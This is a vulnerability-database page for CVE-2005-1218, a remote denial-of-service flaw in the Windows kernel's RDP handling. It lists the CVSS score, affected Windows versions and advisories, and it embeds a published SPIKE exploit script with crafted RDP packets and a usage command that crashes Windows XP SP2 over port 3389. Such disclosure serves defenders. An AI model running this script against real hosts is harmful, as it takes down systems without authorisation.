CVE-2005-1218 : Detail

CVE-2005-1218

60.3%V4
Network
2005-08-10
02h00 +00:00
2018-10-12
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The Microsoft Windows kernel in Microsoft Windows 2000 Server, Windows XP, and Windows Server 2003 allows remote attackers to cause a denial of service (crash) via crafted Remote Desktop Protocol (RDP) requests.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 1143

Publication date : 2005-08-08 22h00 +00:00
Author : Tom Ferris
EDB Verified : Yes

// get SPIKE here: http://www.immunitysec.com/resources-freesoftware.shtml /str0ke // // Windows XP SP2 'rdpwd.sys' Remote Kernel DoS // // Discovered by: // Tom Ferris // tommy[at]security-protocols[dot]com // // Tested on: // Microsoft Windows XP SP2 // // Usage (SPIKE) : ./generic_send_tcp 192.168.1.100 3389 remoteass.spk 1 0 // // 8/9/2005 Security-Protocols.com // // This program is free software; you can redistribute it and/or modify it under // the terms of the GNU General Public License version 2, 1991 as published by // the Free Software Foundation. s_block_start("packet_1"); s_string_variable("03"); s_binary("03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A 20 6D 73 74 73 68 61 73 68 3D 41 64 6D 69 6E 69 73 74 72 0D 0A"); s_binary("03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A"); s_string_variable(""); s_binary("41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41"); s_string_variable(""); s_block_end("packet_1"); s_block_start("packet_2"); s_int_variable(0x0500,5); s_block_end("packet_2"); s_block_start("packet_3"); s_binary("000002020000"); s_string_variable(""); s_block_end("packet_3"); // milw0rm.com [2005-08-09]

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2003_server >> Version datacenter_64-bit

    Microsoft>>Windows_2003_server >> Version enterprise

      Microsoft>>Windows_2003_server >> Version enterprise

        Microsoft>>Windows_2003_server >> Version enterprise_64-bit

          Microsoft>>Windows_2003_server >> Version enterprise_64-bit

            Microsoft>>Windows_2003_server >> Version r2

              Microsoft>>Windows_2003_server >> Version r2

                Microsoft>>Windows_2003_server >> Version r2

                  Microsoft>>Windows_2003_server >> Version standard

                    Microsoft>>Windows_2003_server >> Version standard

                      Microsoft>>Windows_2003_server >> Version standard_64-bit

                        Microsoft>>Windows_2003_server >> Version web

                          Microsoft>>Windows_2003_server >> Version web

                            Microsoft>>Windows_xp >> Version *

                              Microsoft>>Windows_xp >> Version *

                              Microsoft>>Windows_xp >> Version *

                              Microsoft>>Windows_xp >> Version *

                                Microsoft>>Windows_xp >> Version *

                                Microsoft>>Windows_xp >> Version *

                                References

                                http://www.securityfocus.com/bid/14259
                                Tags : vdb-entry, x_refsource_BID
                                http://marc.info/?l=bugtraq&m=112146383919436&w=2
                                Tags : mailing-list, x_refsource_BUGTRAQ
                                http://www.us-cert.gov/cas/techalerts/TA05-221A.html
                                Tags : third-party-advisory, x_refsource_CERT
                                http://www.kb.cert.org/vuls/id/490628
                                Tags : third-party-advisory, x_refsource_CERT-VN